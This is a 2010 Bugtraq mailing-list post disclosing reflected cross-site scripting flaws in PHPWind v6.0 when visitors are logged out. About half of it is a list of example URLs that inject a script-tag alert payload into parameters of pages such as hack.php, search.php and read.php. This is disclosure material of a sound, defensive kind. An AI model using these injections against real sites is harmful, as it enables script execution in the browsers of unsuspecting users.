[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
There are lost of xss vul in PHPWind v6.0 !
- To: <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: There are lost of xss vul in PHPWind v6.0 !
- From: lis cker <liscker@xxxxxxxxxxx>
- Date: Thu, 18 Mar 2010 18:44:01 -0700
I found the PHPWind v6.0 just filter the xss code when the visitors login in,
but it doesnt do it when login off.
An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site.
This flaw makes its all the parameters in all the pages have the xss flaws when
we login off!
Like "hack.php" "search.php" "read.php" "post.php" "thread.php"
"profile.php" "sort.php" "message.php" "userpay.php" and so on.
For example:
http://www.example.com/hack.php?H_name=bank"><script>alert(/Liscker/);</script>
http://www.example.com/search.php?asc=desc"><script>alert(/Liscker/);</script>
http://www.example.com/read.php?nowtime="><script>alert(/Liscker/);</script>
http://www.example.com/post.php?fid=10"><script>alert(/Liscker/);</script>
http://www.example.com/profile.php?action=forumright"><script>alert(/Liscker/);</script>
http://www.example.com/thread.php?skinco=black"><script>alert(/Liscker/);</script>
http://www.example.com/message.php?action=scout"><script>alert(/Liscker/);</script>
http://www.example.com/sort.php?skinco=black"><script>alert(/Liscker/);</script>
http://www.example.com/userpay.php?skinco=black"><script>alert(/Liscker/);</script>
PHPWind v6.0 is vulnerable; other versions may also be affected PHPWind!
Liscker
2010.03.19